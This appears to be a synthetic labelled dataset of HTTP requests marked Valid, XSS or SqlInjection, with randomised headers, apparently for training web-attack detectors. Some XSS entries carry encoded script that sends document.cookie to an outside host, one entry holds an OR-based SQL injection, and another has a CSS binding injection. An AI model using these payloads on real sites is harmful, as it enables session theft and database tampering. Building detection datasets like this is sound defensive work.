Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Mar 08 11:21:47 CET
Last-Modified: Thu, 16 Jun 05 22:09:21 GMT
Host: 191.120.182.67
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-korean, iso-2022-jp, x-mac-ce;q=0.0, euc-cn, iso-2022-jp;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 220.1.146.36
Cookie: ykcayt7t=eliiS1DF0XO;hul=wuAd1Z9EeQM;IwhereTHservicesMC40=txraceejw9dx3ia0s;9Es=3lfLmen3ctt
Cookie2: $Version="455"
Date: Fri, 11 Sep 09 06:09:06 UTC
ETag: "jzY25ePpsai@EB.S_"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Wed, 30 Nov 05 18:46:45 UTC
If-Unmodified-Since: Tue, 07 Aug 07 08:24:33 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 26
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: -85
Referer: /mu5tied/rskrteCj/apsHnp3/o3yOgnt/nley.php3
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: HttaThntova
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: FTP/0.8 171.91.229.27:70198, 8.1 199.243.97.31, HTTP/7.0 237.140.236.126
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

rgpiihei=<div    style =   "     binding:     url([http://www.ar.com/script/sccss0.msf]);   " >&haglohaosglfutt= en ot<i-gg&dndoAce=|idee&Uiha&hoc=group by;&hCtitelnet1Xperl=16079796&eaeewng=tresothAfh9ceeH

End - Id: 46843
Start - Id: 21732
class: Valid
GET /Olw/pa2ia8O0Xm/YizneZowHL_tlog/o6P0Llv9KOmUevVnz7gu/bks8F5PhttpsL79/uQsamVh@biMJ5/owyq6vB2mEeATgz/yfkL/tTec6aee.cfm?3pduetFhttpshDXT=954652&h4tos=wnsannsyyd&wqB2Jrcjc=wLCgBAWBeFYE&hJ_jNdocumentD00aNdC=rmy&dl=shsafanc%27upydh7&dactrea9nsLg=29526951&1et=isrelrshe2s%24libmo&replaceod3=600&xaCu5ai7t6t6i=3APZ&mheenktrzurvtrn=1659001&seia=ntsvs%7Ee%25hte1&nRh6ctmRttH=tpxQtjQ0hEz&acceptutelnetS9ytDYtUm=eIBJ2xGKF6YY&iyir=easWc9tcu&aoeyaetoIem=47 HTTP/1.0
Host: www.Cimy.ch
Connection: keep-alive
Accept: audio/*;q=0.8, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: nhOeozi1-tzn;q=0.0, fitox-Oy2gioq;q=0.9, r-mbeEyoo;q=0.5
Cache-Control: no-transform
Client-ip: 211.7.17.117
Cookie: 5eettts2srito=2;sinS=6773474451;tEwvnsbtzl4=5;aERussr;ssoun8r7hmetoj=A'eosclCz t0
Cookie2: $Version="9"
Date: Thu, 27 May 04 08:51:04 UTC
ETag: "PqpR7XP5.GNrKwl-p@r"
Expect: trmpnktn
From: atahe4oK@cEwNqe.fr
If-Modified-Since: Sat, 18 Feb 06 07:25:27 UTC
If-Unmodified-Since: Fri, 04 Jun 04 07:58:42 UTC
If-Match: *
If-None-Match: ".@YiD_ZPs0Bvodamc"
If-Range: "UrL2Hr2K-uoq@CST0mI"
Max-Forwards: 8
MIME-Version: 4.3
Pragma: eiecB=o
Proxy-Authorization: NTLM YnhjaXd1Y2VIY3lJbnplcHNpYVRTZnN0ZW5lczNuZHRqMWxlbmZybGl0cw==
Authorization: Basic YnRtc0FscjpzYTllbw==
Range: 2-286,124579-86667
Referer: /anohn/weyct/bieedcar/i42ezltj/tqu8nEt.pdf
TE: trailers
Trailer: Trailer
User-Agent: 6lhtIetNt (hbmH8bRPsZ; nGJSWdeI; aNZNrqX1z; o8Y@GmR1e; nu-Lv51)
UA-CPU: Sparc
UA-Disp: 079,7856,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 632x3686
Via: 2.5 www.nubed.shtml, dea/3.0 www.ceae6RhT.shtml
Transfer-Encoding: deflate
Upgrade: Sih/5.8, znid05/1.0, rex/6.4
Warning: 021 178.49.204.19 "exttupaDcea1e" 
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 21815
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21732
Start - Id: 11290
class: Valid
GET /fotcunf/Famc9oohoifana/w@sWWkBoNgVNLRq8k.dll? HTTP/1.0
Host: www.qs8dsy7s.com
Connection: close
Accept: text/html, text/plain, audio/*;q=0.5
Accept-Charset: windows-1253;q=0.5, x-mac-ce;q=0.3, windows-1250;q=0.7
Accept-Encoding: deflate, gzip, identity;q=0.3, deflate, gzip;q=0.9
Accept-Language: eenn6iI-etzrbnm;q=0.0, orhce-hfrt
Cache-Control: max-stale=7
Client-ip: 158.178.212.28
Cookie: an=aqme
Cookie2: $Version="30"
Date: Fri, 02 May 08 20:45:32 UTC
ETag: "ncQ4z0YGv8tD7s-fA"
Expect: ur2opT=nBatdxed;nhvan
From: srhhmsv@tnTl.fr
If-Modified-Since: Sat, 05 Jan 08 08:01:32 GMT
If-Unmodified-Since: Sun, 01 Jun 08 20:42:55 GMT
If-Match: "@4mSvjT7Y4m1QcNi"
If-None-Match: "CjI3W4.UhtZLbnXOfL"
If-Range: Sat, 16 Jul 05 21:04:26 GMT
Max-Forwards: 0428
MIME-Version: 1.4
Pragma: tto='t0Ilwee'
Proxy-Authorization: Digest nc=3c06C92E
Authorization: Digest algorithm=MD5
Range: 51-551841
Referer: /geadRCm/iTbd/anoE2xrr/fbucsd/rtraarS9.js
TE: trailers,deflate,trailers
Trailer: Date
User-Agent: tdad/2.6.7.8
UA-CPU: StrongARM
UA-Disp: 2659,0505,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 2360x349
Via: FTP/2.9 www.dacshart.png:5200
Transfer-Encoding: deflate
Upgrade: Iinf/7.1, oavrcs/0.2, aMti/2.8, uud/0.6, sprmls/3.8
Warning: 665 8.130.241.150:99 "miciymt" 
X-Forwarded-For: 144.202.151.128
X-Serial-Number: 7492268797432274
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11290
Start - Id: 31501
class: Valid
GET /cEtharp/V7yn/iaqnxmisXplnbeannmb/regrEsksnEr/YtMiL.asmx?yillREieei=3446&1UhomeelfhRnD=ymw&Lue=nfxt5Baznka3tttn&0ealo2reIc=im&rpcs6=%3Ea&ugnth=a91E%3E2ei&n0u-KETDAa=dvcgmODXmR&lioarbcdelssgrm=+-tmutdc%3EeitbP3u4&acshrme6aroon=utlvsock_streampDservicesrh3&Itureae4bdt=8493&9vCs5UsIHCfK=httpsMaho&KKNDJ=187586755&oseO4niwfo0N=andiu&ce3elsdeseehad=+Y&oeaycseerna=rtexeceelestyleeerrt HTTP/1.0
Host: 39.137.205.180
Connection: lnooh
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 192.51.134.227
Cookie: thhnj= glse;fme
Cookie2: $Version="2"
Date: Sun, 14 Mar 10 18:35:29 UTC
ETag: "pkw6Carjqe0@q5t.F"
Expect: 100-continue
From: mstwBtp@pbnhonoigi.uk
If-Modified-Since: Thu, 27 Jan 05 11:05:25 UTC
If-Unmodified-Since: Sun, 05 Apr 09 15:52:16 GMT
If-Match: "AA7IfXlV97GNvJ@PTNl"
If-None-Match: *
If-Range: "3rfjt7MiqMDF9E1Ja"
Max-Forwards: 4691
MIME-Version: 8.9
Pragma: n=szs
Proxy-Authorization: Digest nonce
Authorization: NTLM Z3JyYWR2ZG5uZW9tZHBpb3duZWFvbHRod2s2ejdUdW9FZHNubnV1bmVyanM3ZHJt
Range: 23269-,-0812
Referer: http://www.Crnsunfo.de/yirditt/edlpde/3yuselh/tulfasr6/2dai.htm
TE: chunked,gzip
Trailer: If-Match
User-Agent: aPfc/2.6.1.5
UA-CPU: Sparc
UA-Disp: 0922,5668,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 484x1465
Via: 4.4 244.212.144.127, 1.0 www.grfc4.jpg, 9.9 71.172.203.142
Transfer-Encoding: nanln; eEiortit=eOEsmf
Upgrade: MOfb3f/5.6, Lad7c/6.6, lia/8.9, nrdo/8.5, dmy/1.0
Warning: 187 www.tdwd.js "edymttrish6s2ehurma" "Thu, 12 Mar 09 02:19:38 GMT"
X-Forwarded-For: 41.171.103.8
X-Serial-Number: 5515370509152
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31501
Start - Id: 47212
class: XSS
GET /XNRUExJr6jQlj0Z/xoI/ubns2/umetakaccess_logtGd1gGDFT/gotiGehnUmer2ssoD/pK4vIQ9McqDMWQh11R/EFsock_stream937bgsoundu/d9A/otTSGIhgAwzE5pp/sWBR7bhvF9_tlGpFHSaz.cfm?gUD9OqRiN0=xuo&yltmw=shcxAtk&mPEsrarrmo=eeep&InasetB=qa2&lecaf=3npas%3Dmoerhe99+&epeadertn=2808754&btOc=Aunynrilzach&dnthu3dygt=%3Cimg+src%3D%26%7B%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.mach.com%2Fcgi-bin%2Ftegedeleor.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B+++%3E&PEG3o5=sflorettseqar8g&7f8ioemahUnena=r5YpMubCyZq&emxE311eecy=itw&nh9Isnskh=719&ei6eo=iUoisb&e3rcf=19&oeRo86yReuleqr=ETtswce2nqperls HTTP/1.0
Host: www.cF0e8ct9.biz
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-874;q=0.5, gb2312;q=0.3, iso-8859-15, windows-1252;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 220.86.207.11
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Mon, 14 Jan 08 11:21:30 GMT
ETag: "Cd@zFhQSm83VDPBRZino"
Expect: dtpt0epr
From: ceqdbn@v02go.fr
If-Modified-Since: Fri, 14 Oct 05 21:14:44 CET
If-Unmodified-Since: Sat, 26 Jan 08 08:25:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Feb 07 19:02:57 GMT
Max-Forwards: 6
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: NTLM YU0yY0VudEluSGlpZXY1ZWlvcmVORHRwdW9vZHdhbmFzeG9ydXViZDk=
Range: 8-,46-,-554862
Referer: http://MoOeaRNo.it/ilat7.jpeg
TE: gzip;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 1.1; mi-6v; rv:8.8.7) Gecko/61347847
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: FTP/2.3 200.15.38.82
Transfer-Encoding: compress
Upgrade: sdloi/4.2, a9og/5.3, Who9/3.5
Warning: 326 133.104.64.243 "thlBedsxran6eholh" 
X-Forwarded-For: 255.235.206.195
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47212
Start - Id: 42231
class: SqlInjection
GET /r6hdKqj5B-oQmj.tiff?ABAnodewmL=OR++++%27sstXg%27++%3D+++++N%27+++++%27&vehoniig=ptiphphn%25oatad&CTWtF=7991&iiecgeh=161&hsnoedndI=rti HTTP/1.0
Host: www.mialk.be:0120
Connection: close
Accept: */*;q=0.5
Accept-Charset: cp-936, cp-932, iso-10646-ucs-2;q=0.2
Accept-Encoding: *
Accept-Language: ecHoet-rk, yscPn8-lDnEih, trF-nf
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: qinlra0e=3888;rsoshs=0497;1s=59297554;empm=36017;hsEe2ia=o;hhh_8objectfZ=p bco
Cookie2: $Version="306"
Date: Sun, 16 Aug 09 06:09:12 UTC
ETag: W/"PpexkksMSt4M7_y6m"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Wed, 17 Jan 07 10:38:58 CET
If-Unmodified-Since: Thu, 07 Jun 07 11:18:37 GMT
If-Match: *
If-None-Match: "UlE8z_q4FyB7iV_Zfc"
If-Range: "pv@qrWadt1tIHUizA"
Max-Forwards: 69
MIME-Version: 1.3
Pragma: 0tmeey=wlEwgsir
Proxy-Authorization: Digest cnonce="trns"
Authorization: Digest nc=bCC0Fe6c
Range: 4539-14148,-19,934-
Referer: http://www.atolrA.st/dat1in50.css
TE: chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.1 (X11; U; Linux i586 6.9; pg-sr; rv:0.2.0) Gecko/97911328
UA-CPU: x86
UA-Disp: 378,9839,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 9.1 39.70.99.140, 8.2 96.107.83.22, HTTP/8.7 222.74.230.234:43
Transfer-Encoding: drmito; 7hrdthc=indonCo
Upgrade: iunoNg/9.6
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42231
Start - Id: 2775
class: Valid
GET /dyttigt1an2seecsnia/iwRM_xH3@eW/ru_OEq2jDeKFHR-i/s74akHvu7MKXPKnhLump/lotjy4e8xteacmsues/rS.4pDdeyl@/dihiohleQrrm/cJ/etnI8Y2UMaKuQ/5IjhTh7l/GWG9rXZU@O7KQpv/89oeTeueeavlc.cfm?inovhf=ko2eme&TlaIst=nistylecaoslg3bye&lh5nhbeOXunnepi=1343716402&ieeihEnd=eel54saHh HTTP/1.0
Host: www.teate8.be:26198
Connection: keep-alive
Accept: image/png;q=0.9, text/xml;q=0.8, text/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ag0jncqW-oraolheh
Cache-Control: min-fresh=22365
Client-ip: 50.180.170.170
Cookie: vie5d=cetn);eei=nnooh/1xe&9;aI=owinntcers5rdaoe3se;Rdeznrnolfp5tq=tcashutdownC;4di5aalno86yn7e=najr5totrsdaudeis;igl0tde4=textermn
Cookie2: $Version="55"
Date: Mon, 13 Aug 07 06:18:01 GMT
ETag: "0_4Ow6kduQ8_8BQzx"
Expect: 8rlgu=eqs8
From: mjcra@eenaabniO.org
If-Modified-Since: Sat, 30 May 09 02:58:54 UTC
If-Unmodified-Since: Mon, 05 May 08 06:47:46 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 01 Aug 04 10:17:37 GMT
Max-Forwards: 477
MIME-Version: 5.1
Pragma: eamy=5slIpRo
Proxy-Authorization: Digest realm
Authorization: Digest nc=068FE1A2
Range: 771-26
Referer: http://8laeIvi.net/toOm/decht8g/3ihiE/heef9te.js
TE: gzip;q=0.8,deflate;q=0.1,trailers
Trailer: Warning
User-Agent: Mozilla/7.7 (X11; U; Unix 1.0; em-rl; rv:7.4.8) Gecko/70967222
UA-CPU: Sparc
UA-Disp: 1331,8639,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x004
Via: nsn5/9.7 www.pmumeer.png, pic/2.5 www.r1ti.gif, 2.7 www.3ezirci.htm:2130
Transfer-Encoding: deflate
Upgrade: silEs/6.4
Warning: 433 www.3iZiO.shtml "i0ieOtioafSs" "Thu, 10 Jun 04 22:10:06 CET"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2775
Start - Id: 6624
class: Valid
PUT /ha-C2oxh06/ssIaeYoDt/uip/on6cgccj.jsp? HTTP/1.0
Content-Length: 100
Content-Language: 8e,Vdoe,eveia
Content-Encoding: gzip
Content-Location: /fLLn/ceecihF/ihakapqi.php4
Content-MD5: Q3RvbWhUOGVhb2VtZUplbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 11 Nov 08 06:02:45 CET
Last-Modified: Mon, 22 Jan 07 16:13:48 CET
Host: 199.172.142.85:39444
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: keAaaa-rahof
Cache-Control: max-age=79
Client-ip: 54.197.158.136
Cookie: irwOi0sie=xJkjWs;iEbn=and ODOcr7anteth;crU0iGyr=yxe9RqkJNxXh;Hfao9Rys2=n'r ;me0orE0ettro=w;nAsrt5iu=inetcatOeRauJ2Y
Cookie2: $Version="4"
Date: Wed, 18 Feb 04 23:16:17 GMT
ETag: "eEKjFXirf.RRmxE3"
Expect: 100-continue
From: eoAaEax@lpusiacur.fr
If-Modified-Since: Mon, 28 Jun 04 08:45:29 UTC
If-Unmodified-Since: Mon, 22 Sep 08 01:59:30 GMT
If-Match: *
If-None-Match: "AUBgqmjv.yb70s0"
If-Range: Fri, 26 Aug 05 21:12:22 GMT
Max-Forwards: 07
MIME-Version: 9.2
Pragma: Du0oret=gnUIeu7y
Proxy-Authorization: zmtsI sarl0ue=aryfers
Authorization: Digest opaque="s6Er"
Range: 9-
Referer: http://8eIEci.gov/scLnen/9ilri6gs/ondfr.pdf
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: esoepniDe1r7
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7771x7068
Via: 5.0 42.73.17.121, 6dv/6.5 www.mnrvoe.gif
Transfer-Encoding: identity
Upgrade: thsp8p/2.1, eptIic/7.2
Warning: 729 228.123.175.18:441 "a6o1oy" "Wed, 13 Apr 05 04:36:18 UTC"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

LL4X%u=567&boot.iniOS4g=8LxUxHZ-Y3&BozzDoU=aWFCJHraLA&ciweardopl=zdgi&5nolswhat=tpassthru&Atqil=lnth

End - Id: 6624
Start - Id: 34755
class: Valid
PUT /Irht6mr3tnhm/zBjbJVrS0/ge.tiff? HTTP/1.0
Content-Length: 250
Content-Language: Umsa5i,nianl,x1mn
Content-Encoding: identity
Content-Location: http://cccbAop.be/oiuiia.nsf
Content-MD5: Z0duaGlnaE5tb3BpaHlPOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 May 04 02:01:45 CET
Last-Modified: Thu, 11 Mar 10 20:52:33 CET
Host: www.mjftit.cz
Connection: Wusnpah
Accept: audio/*, audio/*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ayxAuse-rra7oel, s7ntn-Aoa;q=0.3
Cache-Control: only-if-cached
Client-ip: 157.24.126.22
Cookie: @21ZCKqzsFk@=1@RgD;sNt4ptmasgWi=15;0dT9ubVecatk=9728943;A4Cmp=2870;hsYP.1hlJcT2=2016812;oirsmgdnfa8=sER_QYrIu
Cookie2: $Version="128"
Date: Fri, 08 Apr 05 11:36:43 UTC
ETag: "_Arr8qPQxSrMwBWpL3d"
Expect: 100-continue
From: iaoc1brO@mxbt8wsL.be
If-Modified-Since: Wed, 20 Jun 07 12:28:39 UTC
If-Unmodified-Since: Fri, 24 Nov 06 09:28:42 UTC
If-Match: *
If-None-Match: "h4LTAnqOOxiQP@mGRKo"
If-Range: *
Max-Forwards: 594
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: oslaso m4kt=chas
Range: 019-
Referer: http://tue83nec.de/iasectn/owOw.msf
TE: trailers,gzip,gzip;q=0.5
Trailer: Pragma
User-Agent: rtpNDoao (ipeNsTu4K; cBvbeYca_3)
UA-CPU: 68000
UA-Disp: 807,514,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 012x6742
Via: FTP/6.5 224.60.73.32, 3.7 10.198.123.20:25
Transfer-Encoding: deflate
Upgrade: r4ic/7.1, 0fe/0.7
Warning: 123 100.107.127.239 "n5ewoMdyi4" "Fri, 13 Oct 06 14:28:46 GMT"
X-Forwarded-For: 24.228.137.43
X-Serial-Number: 438515700357527
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lnosjkhlk0qsio=n'52ta&vy7YiUDVm=av.g5&Rv1y3_3_=433&mrho=dta&qT=7&ihan2sg=iMcdMmW&gGnBRkntott=e&onm=ifttdgninsert?riexr hgtu&HxmlITsdMBN6=e4&@7scripta3QEmvT9=05&BjwNEande7U=\etu6o9oS&ereyGlnawy=i2 h%umun&sajzoHf=dBI&hiH3hihUvpryzds=iogjiMBjqW-

End - Id: 34755
Start - Id: 21474
class: Valid
GET /et4z1-o/f.ocO1nn0/Wrv.mdb?ftei=kkPMZb6s2UWS&ZZjLfG=Ia2htpass&ats1a=oG.QE%40vJnRz6&suntrgK=62 HTTP/1.1
Host: www.lOshta.org:0395
Connection: keep-alive
Accept: application/x-tar;q=0.1
Accept-Charset: x-mac-hebrew, macintosh;q=0.0, euc-tw
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: max-stale=488
Client-ip: 8.200.88.162
Cookie: M@Vrdyb=698;ohDdcgfRo=8;ayattpeau=r odw encbTey;ovctofDl=g.nVU
Cookie2: $Version="99"
Date: Sat, 12 Aug 06 06:39:06 GMT
ETag: W/"SP92jKSMi0F97Ui36wfH"
Expect: 100-continue
From: eesn@eeanDbi.org
If-Modified-Since: Tue, 13 Sep 05 06:09:35 CET
If-Unmodified-Since: Fri, 11 Sep 09 02:56:55 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 006
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: aats 5Olh=ay0rd
Authorization: Basic YWk5aGNlOnNvSW5j
Range: 78223-,397-29073
Referer: /Orhtgrtc/terrhhi/tcAiNhrt/hNlhEd/eadoeA.php
TE: trailers,deflate;q=0.5,deflate
Trailer: Connection
User-Agent: Mozilla/9.2 (X11; U; Solaris 1.9; ie-tm; rv:3.9.3) Gecko/64255154
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7753x3387
Via: HTTP/7.1 www.ekeyv6.html, 4.6 www.oTtehr0.jpeg, 5.9 www.ute1.jpeg
Transfer-Encoding: compress
Upgrade: apHe/6.7, debg/6.0
Warning: 550 www.i2iee6oc.shtml "oSacwy8tbotbo3s3Oheu" 
X-Forwarded-For: 58.196.148.222
X-Serial-Number: 53165421880572
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21474
Start - Id: 48032
class: XSS
GET /raamii/h4winntD.hOshutdown/thPlioit/eiz/wHaejt/olOneukSiTsqrND/gW1OQ7-rblX4s5r7xT/ig0icMoNSH8.xY1C/sj-GY1d7cAJahsbTY.shtml?lzet8hmstR=Rji&t0sjbnv=saf2llldbC&gebrtcaiDs=sma&form0dRkmsock_streamdocumentIsD=3140&cyp=ygooro3iseUn1t&tAdhsae6w3r=041254241&hh3=475697&ds8ea60wdIsais=ee&jcsDnullsduq=laenhe+4%7Cn&giMe=%3Cbgsound+++src++%3D+%22+++++javascript%3A++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.na.com%2Fcgi-bin%2Flasedengis.cgi%27%2Bdocument.cookie%29%3B%5D++%22++%3E&3boHo4LieHale=qOJMa0r&etuec77tctsnise=77143&anehtoa=oIoeoi5csafhtt&3i=e4qddehepSilli HTTP/1.0
Host: 213.239.136.94
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-10646-ucs-2, iso-8859-4, windows-1255;q=0.8, utf-8
Accept-Encoding: *;q=0.2
Accept-Language: aaHnhB9-Xeht, deweoIo-h4ti1er;q=0.9
Cache-Control: min-fresh=7
Client-ip: 98.157.200.107
Cookie: nlriraT=e
Cookie2: $Version="136"
Date: Fri, 01 Feb 08 11:47:14 CET
ETag: "RXIPZOoD.fV7rkbkIP4"
Expect: Sote=osmtMnst
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 23 May 09 04:49:00 GMT
If-Unmodified-Since: Thu, 27 Oct 05 09:03:19 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 May 08 17:20:03 GMT
Max-Forwards: 8820
MIME-Version: 4.1
Pragma: stt33sax='hy8iiDih'
Proxy-Authorization: Digest nc=DD143aEB
Authorization: Digest response="FAEfCADf616eD0Ba8AC58b324117Dcc8"
Range: -605,08388-217,461352-2
Referer: http://www.i8es0.cz/etlsbI/tpoLro.exe
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/9.5 (compatible; MSIE 8.8; Linux i386; hithga; deaagY)
UA-CPU: PowerPC
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 717x263
Via: 1.7 71.35.142.28, 9tlea/8.8 www.fluilt.tiff
Transfer-Encoding: compress
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 228.60.15.61
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48032
Start - Id: 21469
class: Valid
GET /aODt0P3c0kNUpi.uiI7/aGUOOgAcw/uftrvdMo.sh?wm5af26li=tAuXtKIamnPC&X3m7L=e84z&m7hiehset=%7Emyg%2Fedr3iiframed%24&hgdlrny2rk=4%3Di&0ec9lawuso=7290774 HTTP/1.1
Host: www.nEnp.it
Connection: olaaeo
Accept: image/png, text/*, application/*;q=0.9
Accept-Charset: iso-8859-5
Accept-Encoding: 
Accept-Language: 7bNojo-b9c, eta-ape;q=0.9
Cache-Control: Ore=vcfM
Client-ip: 8.200.88.162
Cookie: M@Vrdyb=698;ohDdcgfRo=8;ayattpeau=r odw encbTey;ovctofDl=g.nVU
Cookie2: $Version="0"
Date: Sun, 17 Jun 07 23:04:27 CET
ETag: W/"Y.O-0uEW4tNzrNYwA"
Expect: 100-continue
From: eeao@3rhoo.be
If-Modified-Since: Wed, 12 Oct 05 04:06:03 UTC
If-Unmodified-Since: Fri, 11 Sep 09 02:56:55 GMT
If-Match: *
If-None-Match: "Xtk5lDeRAlppA2VRAwd"
If-Range: Mon, 28 Feb 05 19:50:49 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: aats 5Olh=ay0rd
Authorization: 2rri mhina8r=e8nned
Range: 78223-,397-29073
Referer: http://eiapjt.org/lembp0Tp/oQzm.php
TE: chunked;q=0.2
Trailer: From
User-Agent: csraEc9se (hMjc9rwYH6; i5ahZg; oggfqiDnnw; hOxR2-; n3u16bmX)
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 887x6118
Via: otst/7.7 103.7.195.201
Transfer-Encoding: deflate
Upgrade: rer/8.5, Aooz2/8.7, ipRq/8.0, Ao3eSe/7.6
Warning: 502 www.le6w08da.jpeg "cfeinF" 
X-Forwarded-For: 58.196.148.222
X-Serial-Number: 53165421880572
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21469
Start - Id: 18265
class: Valid
GET /execjrlgoDxU_eZmJ/eosinchrea9seoygs/a7I_dFMO/1ru4dropN_g_lsvinputJev/HAge3elgiep/ze0/iVxqio24RQ38Z72Rf/trOp/sozn/efv_dks0WEiop1/cPOh0R.sh?wuen6fIttf=0375&nlsazot=tFfnjO4igveJ&5ihnmSr5ionscSl=8i&ljwksee0d=0eltd&ideldh8umIO=rAAkGSWX&Hqiframe8w2positionCU-5=ineh%24lsualt&dfCgdebn=7&tSe3s4tohpoTI=hwbbehlsonit&asIxo=aO71qdJgx&eews0S9Ynroftt=3294185 HTTP/1.1
Host: 111.6.47.68
Connection: 327nl
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: dclt-2hlvt;q=0.4
Cache-Control: no-cache
Client-ip: 62.229.5.206
Cookie: ete=tsjmea2srerlieDrAl;agirtlsonaEset=9037;edchofRieputu=609412;optL4PNnwherewUobject=gu9g;troabeben=dnoretrtrss
Cookie2: $Version="885"
Date: Sat, 28 Nov 09 10:44:11 CET
ETag: "Z_JZiwTcam5eSPlNt5"
Expect: 100-continue
From: Aa02@teEtrsmi.ch
If-Modified-Since: Wed, 16 Sep 09 10:47:38 GMT
If-Unmodified-Since: Thu, 02 Feb 06 03:10:27 CET
If-Match: "4gfe_Z6g5dkTtpHPu7P"
If-None-Match: *
If-Range: *
Max-Forwards: 050
MIME-Version: 5.7
Pragma: tfrxarr='hri'
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: Digest realm
Range: -043,7-,317257-
Referer: http://tBTagra.uk/Httn/nnrhsbha/grdo.doc
TE: chunked;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/3.7 (Windows; U; WinNT 7.9; ui-er; rv:4.0.6) Gecko/84258221
UA-CPU: Sparc
UA-Disp: 9840,221,16
UA-OS: Win9x
UA-Color: color32
